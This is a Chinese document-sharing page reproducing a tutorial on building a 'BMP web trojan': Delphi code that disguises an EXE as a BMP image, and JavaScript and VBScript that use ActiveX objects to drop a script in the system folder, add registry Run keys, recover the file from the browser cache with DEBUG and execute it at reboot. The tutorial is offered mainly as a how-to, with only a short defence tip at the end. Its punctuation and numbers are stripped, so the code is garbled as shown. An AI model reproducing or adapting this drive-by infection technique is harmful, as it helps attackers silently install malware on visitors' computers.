关闭

关闭

关闭

封号提示

内容

首页 制作图片木马教程(如何制作图片木马).doc

制作图片木马教程(如何制作图片木马).doc

制作图片木马教程(如何制作图片木马).doc

jlnuyxl 2011-11-04 评分 0 浏览量 0 0 0 0 暂无简介 简介 举报

简介:本文档为《制作图片木马教程(如何制作图片木马)doc》,可适用于IT/计算机领域,主题内容包含Administrator高级目录入侵方法 制作图片木马教程(如何制作图片木马)HYPERLINK"javascript:void()"何谓BMP网符等。

Administrator高级目录入侵方法 制作图片木马教程(如何制作图片木马)HYPERLINK"javascript:void()"何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同MIME木马是把一个EXE文件用MIME编码为一个EML(OUTLOOK信件)文件放到网页上利用IE和OE的编码漏洞实现自动下载和执行。然而BMP木马就不同它把一个EXE文件伪装成一个BMP图片文件欺骗IE自动下载再利用网页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹找到下载后的BMP文件,把它拷贝到TEMP目录。再编写一个脚本把找到的BMP文件用DEBUG还原成EXE并把它放到注册表启动项中在下一次开机时执行但是这种技术只能在X下发挥作用对于K、XP来说是无能为力了。看上去好象很复杂,下面我们一步一步来:)EXE变BMP的方法大家自己去查查BMP文件资料就会知道BMP文件的文件头有个字节简单来说里面包含了BMP文件的长宽、位数、文件大小、数据区长度。我们只要在EXE文件的文件头前面添加相应的BMP文件头(当然BMP文件头里面的数据要符合EXE文件的大小啦)这样就可以欺骗IE下载该BMP文件开始我们用JPG文件做过试验发现如果文件头不正确的话是不会下载的转换代码如下:programexebmpusesWindows,SysUtilsvarlen,row,col,fs:DWORDbuffer:arrayofcharfd:WINFINDDATAh,hw:THandlebeginif(ParamStr()<>'')and(ParamStr()<>'')thenbegin如果运行后没有两个参数则退出ifFileExists(ParamStr())thenbeginFindFirstFile(Pchar(ParamStr()),fd)fs:=fdnFileSizeLowcol:=whiletruedobeginif(fsmod)=thenbeginlen:=fsendelselen:=fs(fsmod)row:=lendivcoldivifrow>colthenbegincol:=colendelseBreakendFillChar(buffer,,){一下为BMP文件头数据}Buffer:='B'Buffer:='M'PDWORD(buffer)^:=colPDWORD(buffer)^:=rowPDWORD(buffer)^:=lenPDWORD(buffer)^:=lenPDWORD(buffer)^:=PDWORD(buffer)^:=PWORD(buffer)^:=PWORD(buffer)^:={写入文件}hw:=CreateFile(Pchar(ParamStr()),GENERICWRITE,FILESHAREREADorFILESHAREWRITE,nil,CREATEALWAYS,,)h:=CreateFile(Pchar(ParamStr()),GENERICREAD,FILESHAREREADorFILESHAREWRITE,nil,OPENEXISTING,,)WriteFile(hw,buffer,,col,)repeatReadFile(h,buffer,,col,)WriteFile(hw,buffer,col,col,)untilcol<>WriteFile(hw,buffer,lenfs,col,)CloseHandle(h)CloseHandle(hw)endendend 以上代码可以在DELPHI,,中编译,就可以得到一个exebmpexe文件大家打开MSDOS方式,输入exebmpmyexeexemybmpbmp回车就可以把第二个参数所指定的EXE文件转换成BMP格式接着就是把这个BMP图片放到网页上了,如果大家打开过这张图片的话,一定发现这张BMP又花,颜色又单调所以大家放在网页上最好用这样的格式<imgsrd="mybmpbmp"higth=""width="">以下是放在网页上的脚本documentwrite('')functiondocsave(){a=documentappletsasetCLSID('{FDCCFDADBCFDAB}')acreateInstance()wsh=aGetObject()asetCLSID('{DFEFCFAC}')acreateInstance()fso=aGetObject()varwinsys=fsoGetSpecialFolder()varvbs=winsys'svbs'wshRegWrite('HKCUSoftwareMicrosoftWindowsCurrentVersionRunvbs','wscript''"'vbs'"')varst=fsoCreateTextFile(vbs,true)stWriteLine('OptionExplicit')stWriteLine('DimFSO,WSH,CACHE,str')stWriteLine('SetFSO=CreateObject("ScriptingFileSystemObject")')stWriteLine('SetWSH=CreateObject("WScriptShell")')stWriteLine('CACHE=wshRegRead("HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerShellFoldersCache")')stWriteLine('wshRegDelete("HKCUSoftwareMicrosoftWindowsCurrentVersionRunvbs")')stWriteLine('wshRegWrite"HKCUSoftwareMicrosoftWindowsCurrentVersionRuntmp","tmpexe"')stWriteLine('SearchBMPFilefsoGetFolder(CACHE),"mybmpbmp"')stWriteLine('WScriptQuit()')stWriteLine('FunctionSearchBMPFile(Folder,fname)')stWriteLine('DimSubFolder,File,Lt,tmp,winsys')stWriteLine('str=FSOGetParentFolderName(folder)""foldername""fname')stWriteLine('ifFSOFileExists(str)then')stWriteLine('tmp=fsoGetSpecialFolder()""')stWriteLine('winsys=fsoGetSpecialFolder()""')stWriteLine('setFile=FSOGetFile(str)')stWriteLine('FileCopy(tmp"tmpdat")')stWriteLine('FileDelete')stWriteLine('setLt=FSOCreateTextFile(tmp"tmpin")')stWriteLine('LtWriteLine("rbx")')stWriteLine('LtWriteLine("")')stWriteLine('LtWriteLine("rcx")')stWriteLine('LtWriteLine("")')stWriteLine('LtWriteLine("w")')stWriteLine('LtWriteLine("q")')stWriteLine('LtClose')stWriteLine('WSHRun"commandcdebug"tmp"tmpdat<"tmp"tmpin>"tmp"tmpout",false,')stWriteLine('OnErrorResumeNext')stWriteLine('FSOGetFile(tmp"tmpdat")Copy(winsys"tmpexe")')stWriteLine('FSOGetFile(tmp"tmpdat")Delete')stWriteLine('FSOGetFile(tmp"tmpin")Delete')stWriteLine('FSOGetFile(tmp"tmpout")Delete')stWriteLine('endif')stWriteLine('IfFolderSubFoldersCount<>Then')stWriteLine('ForEachSubFolderInFolderSubFolders')stWriteLine('SearchBMPFileSubFolder,fname')stWriteLine('Next')stWriteLine('EndIf')stWriteLine('EndFunction')stClose()}setTimeout('docsave()',)把该脚本保存为"jsjs",在网页中插入:<scriptsrc="jsjs"><script>该脚本主要会在本地机器的SYSTEM目录下生成一个“SVBS”文件该脚本文件会在下次开机时自动运行。主要用于从临时目录中找出mybmpbmp文件。“SVBS”文件主要内容如下:OptionExplicitDimFSO,WSH,CACHE,strSetFSO=CreateObject("ScriptingFileSystemObject")SetWSH=CreateObject("WScriptShell")CACHE=wshRegRead("HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerShellFoldersCache")wshRegDelete("HKCUSoftwareMicrosoftWindowsCurrentVersionRunvbs")wshRegWrite"HKCUSoftwareMicrosoftWindowsCurrentVersionRuntmp","tmpexe"SearchBMPFilefsoGetFolder(CACHE),"mybmpbmp"WScriptQuit()FunctionSearchBMPFile(Folder,fname)DimSubFolder,File,Lt,tmp,winsys'从临时文件夹中查找目标BMP图片str=FSOGetParentFolderName(folder)""foldername""fnameifFSOFileExists(str)thentmp=fsoGetSpecialFolder()""winsys=fsoGetSpecialFolder()""setFile=FSOGetFile(str)FileCopy(tmp"tmpdat")FileDelete'生成一个DEBUG脚本setLt=FSOCreateTextFile(tmp"tmpin")LtWriteLine("rbx")LtWriteLine("")LtWriteLine("rcx")'下面一行的是十六进制换回十进制是(该数字是你的EXE文件的大小)LtWriteLine("")LtWriteLine("w")LtWriteLine("q")LtCloseWSHRun"commandcdebug"tmp"tmpdat<"tmp"tmpin>"tmp"tmpout",false,OnErrorResumeNextFSOGetFile(tmp"tmpdat")Copy(winsys"tmpexe")FSOGetFile(tmp"tmpdat")DeleteFSOGetFile(tmp"tmpin")DeleteFSOGetFile(tmp"tmpout")DeleteendifIfFolderSubFoldersCount<>ThenForEachSubFolderInFolderSubFoldersSearchBMPFileSubFolder,fnameNextEndIfEndFunction这个脚本会找出在临时文件夹中的bmp文件,并生成一个DEBUG的脚本,运行时会自动从BMP文件字节处读去你指定大小的数据,并把它保存到tmpdat中后面的脚本再把它复制到SYSTEM的目录下这个被还原的EXE文件会在下次重起的时候运行这就是BMP木马的基本实现过程防范方法:最简单,删除或改名wscrpitexe文件和DEBUG文件安装有效的杀毒软件,因为这些脚本有好多杀毒软件已经可以查出来了

热点搜索换一换

用户评论(0)

0/200

精彩专题

上传我的资料

每篇奖励 +1积分

资料评分:

/9
0下载券 下载 加入VIP, 送下载券

意见
反馈

立即扫码关注

爱问共享资料微信公众号

返回
顶部

举报
资料